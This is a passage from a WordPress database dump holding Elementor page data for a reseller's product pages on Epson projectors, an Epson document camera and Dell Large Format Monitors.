]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7832,3462,'_elementor_version','2.5.14'),(8669,3654,'_thumbnail_id','3665');
INSERT INTO `wpdp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES (8670,3661,'_elementor_data','[{\"id\":\"1428c7d\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"10c0343\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":32.072},\"elements\":[{\"id\":\"c13c1a7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_02.jpg\\\" alt=\\\"Transform your meeting space\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eaf7a1e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":67.928,\"content_position\":\"center\"},\"elements\":[{\"id\":\"c18c5e2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Transform your meeting space<\\/h2><\\/div><div>Dell, the world\\u2019s number one monitor brand, has the tools and technology you need to facilitate teamwork. With our open standards approach and\\u00a0wide variety of displays ranging from 55\\u201d to 86\\u201d, it\\u2019s easy to find and\\u00a0customize a solution\\u00a0that keeps your team engaged and lets your business thrive.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a29589\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d94f107\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0d139f5\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"02b0460\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f2f2f2\"},\"elements\":[{\"id\":\"23442a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"4c2a77c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_title\\\">Maximize your team\\u2019s productivity<\\/h2><div class=\\\"top-offset-small bottom-offset-small text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_subtitle\\\">Make meetings more efficient with our collaboration-enhancing features and easy connectivity.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2222c78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a87a431\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_03.jpg\\\" alt=\\\"Maximize your team\\u2019s productivity\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"df1a833\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"229d78d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f465b01\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6dddbc3\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ad2406f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.64},\"elements\":[{\"id\":\"f0cdfa8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_04.jpg\\\" alt=\\\"Next-level teamwork\\\" width=\\\"347\\\" height=\\\"256\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8bd10\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.36,\"content_position\":\"bottom\"},\"elements\":[{\"id\":\"de42688\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Next-level teamwork<\\/h2><\\/div><div><strong>More ways to interact:<\\/strong>\\u00a0Group collaboration is more seamless and intuitive than ever with our interactive monitors<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>. And, a simple touch of your hand or swipe of a stylus allows you to experience real-time interaction with virtually zero lag.<br \\/><br \\/><\\/div><div><p><strong>Collaboration solutions:<\\/strong>\\u00a0Annotate, collaborate and whiteboard with included software like DisplayNote and FlatFrog<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>.<br \\/><br \\/><strong>Collaboration for all:<\\/strong>\\u00a0Dell Screen Drop feature<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>\\u00a0lets you lower the displayed image so that it\\u2019s easy to reach, with touch sensors on either side of the display for three additional height settings to fit people working from varying heights.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5029420\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b8e6817\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"29544d8\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01f3af0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f845c7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"6933422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Captivate your audience<\\/h2><\\/div><div><ul><li><strong>Make the most of your meeting:<\\/strong>\\u00a0With a wide variety of connectivity options, you can quickly connect to the display and seamlessly switch between presenters, allowing your audience to enjoy a smooth and continuous presentation.<\\/li><\\/ul><ul><li><strong>Present crisply and clearly:<\\/strong>\\u00a0Monitor scaling technology allows you to capture your audience\\u2019s attention with exceptionally clear text and vivid visuals.<\\/li><\\/ul><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7a70680\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"670e9e1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_05.jpg\\\" alt=\\\"Captivate your audience\\\" width=\\\"360\\\" height=\\\"267\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a4b5b73\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0df3684\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bb72a42\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67af6a3\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"1823f82\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"2c8aa0a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Dell Large Format Monitors\",\"align\":\"center\",\"title_color\":\"#353535\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73d6a89\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c4bd9f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2816dd3\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=Z98yJnbXWq8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\",\"autoplay\":\"yes\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"746f096\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0102d24\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"249ca4a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d291a0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f2f2f2\"},\"elements\":[{\"id\":\"6228508\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7c029ba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_title\\\">Flexible IT solutions<\\/h2><div class=\\\"top-offset-small bottom-offset-small text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_subtitle\\\">A variety of customization, deployment and management options make Dell Large Format Monitors easy to manage.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fca6377\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"32f148a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_06.jpg\\\" alt=\\\"Flexible IT solutions\\\" width=\\\"445\\\" height=\\\"351\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f0d8bc3\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"be5af88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"28958ec\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b7a77eb\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5bc9eb9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5e074cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_07.jpg\\\" alt=\\\"Adapts to business needs. Present and future.\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b39d618\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4f1e8d4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Adapts to business needs. Present and future.<\\/h2><\\/div><div><ul><li><strong>Solutions that work with you:<\\/strong>\\u00a0Dell Large Format Monitors work with a variety of hardware and software, so you can continue using the technology you\\u2019re comfortable with or choose to use some of ours. This makes your new monitor inherently easy to deploy, maintain and use. It can also\\u00a0be loaded with your preferred corporate image, so that it adheres to your security and service standards.<\\/li><\\/ul><ul><li><strong>Customized to your needs:<\\/strong>\\u00a0Your Large Format Monitor will fit your business needs as they evolve. Select the technology you need without paying for unnecessary features and, with its modular capabilities, you can even scale up or down as your needs change.<\\/li><\\/ul><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7383992\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4264633\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"494b60f\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9282776\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"91efb53\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"758e0fa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Easy to deploy. Simple to manage.<\\/h2><\\/div><div><ul><li><strong>A smooth deployment:<\\/strong>\\u00a0With a few painless steps, and a couple of extra hands, it\\u2019s simple to install a Dell Large Format Monitor to a solid wall. Our displays are VESA compatible, so you can pick the mounting solution that best fits your space, whether that\\u2019s a mobile cart, stand or wall mount.<\\/li><li><strong>Manage your meeting spaces:<\\/strong>\\u00a0With RS232 and RJ45<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>\\u00a0interfaces, you can use remote management tools to maintain and control your Large Format Monitors with a network control system.<\\/li><\\/ul><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7ed52d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"35ef182\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_08.jpg\\\" alt=\\\"Easy to deploy. Simple to manage.\\\" width=\\\"355\\\" height=\\\"263\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3643da4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"eba13d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"99eb408\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_09.jpg\\\" alt=\\\"Ultimate management\\\" width=\\\"337\\\" height=\\\"256\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"84d2d5e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"857f2f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Ultimate management<\\/h2><\\/div><div><ul><li><strong>Seamless integration for easy access:<\\/strong>\\u00a0Create an all-in-one solution with the optional Dell OptiPlex Micro PC. It seamlessly integrates into the display<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>\\u00a0without the need for a separate power cord, simplifying access to WiFi, annotation\\u00a0and\\u00a0meeting room management applications.<\\/li><li><strong>Easy to upgrade:<\\/strong>\\u00a0Thanks to\\u00a0it\'s\\u00a0modular design, the optional Dell OptiPlex Micro PC can be effortlessly upgraded, or replaced.<\\/li><\\/ul><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0986c04\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ea07f49\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d8d2e27\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"651dcf7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f2f2f2\"},\"elements\":[{\"id\":\"e0e5fdb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"e3c5aec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_title\\\">Solutions you can count on<\\/h2><div class=\\\"top-offset-small bottom-offset-small text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_subtitle\\\">Our low maintenance monitors and reliable service solutions are here to support you through every presentation.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7c7592f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"8349623\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_10.jpg\\\" alt=\\\"Solutions you can count on\\\" width=\\\"412\\\" height=\\\"325\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b154bbe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8c77514\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ab08df2\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eb13a0c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"69147c9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":34.955},\"elements\":[{\"id\":\"ff020de\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_11.jpg\\\" alt=\\\"Dependable reliability\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e1222e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":65.045},\"elements\":[{\"id\":\"1b3c901\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Dependable reliability<\\/h2><\\/div><div><strong>Peace of mind comes standard:<\\/strong>\\u00a0Your Large Format Monitor comes with a 3-year Advanced Exchange Service<a class=\\\"technote microcontent\\\" rel=\\\"technotes:advanced-exchange-service-monitors\\\">*<\\/a>\\u00a0so that if a replacement becomes necessary, it will be shipped to you the next business day during the Limited Hardware Warranty. And, if you want longer-term coverage, you can extend the Limited Hardware Warranty<a class=\\\"technote microcontent\\\" rel=\\\"technotes:hardware-warranty-monitors\\\">*<\\/a>\\u00a0up to 5-years for additional support.<br \\/><br \\/><strong>Low maintenance. Simple manageability:\\u00a0<\\/strong>Save your staff time and your company money with these reliable, user-friendly monitors. With no hidden costs, annual maintenance or licensing fees, Dell Large Format Monitors can decrease both trouble tickets and training time for your team.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"95edd1d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"542b068\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2c3e21d\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3a24ced\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#f2f2f2\"},\"elements\":[{\"id\":\"c0cc680\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e29177f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6295038\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: 